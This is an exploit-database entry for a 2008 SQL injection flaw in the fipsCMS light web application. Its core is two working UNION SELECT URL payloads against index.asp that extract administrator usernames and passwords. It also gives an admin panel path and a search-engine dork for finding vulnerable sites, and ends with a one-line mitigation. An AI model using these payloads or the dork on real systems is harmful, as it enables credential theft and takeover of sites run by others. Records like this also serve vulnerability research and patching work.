header-logo
Suggest Exploit
vendor:
fipsCMS light
by:
U238
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: fipsCMS light
Affected Version From: fipsASP 2003 - 2008
Affected Version To: fipsASP 2003 - 2008
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

fipsCMS light – © fipsASP 2003 – 2008

This exploit allows an attacker to inject malicious SQL code into the vulnerable application. The vulnerable application is fipsCMS light, which is © fipsASP 2003 - 2008. The exploit code is victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin and victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin. The exploit was found by U238 and was published on milw0rm.com in 2008-07-26.

Mitigation:

The application should be tested for SQL injection vulnerabilities and any input should be validated and sanitized before being used in a SQL query.
Source

Exploit-DB raw data:

Exploit Code:

victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin

victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin

http://localhost:2222/lab/cms/_admin

Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5
Found By U238
# Exploit Search Find: ^o)
#
# fipsCMS light - © fipsASP 2003 - 2008. All rights reserved
#
# fipsCMS light - © fipsASP 2003 - 2008
#
# inurl:"fipsASP 2003 - 2008"
# ************************************************ 

# milw0rm.com [2008-07-26]

Navigation

Suggest Exploit

Services By CQR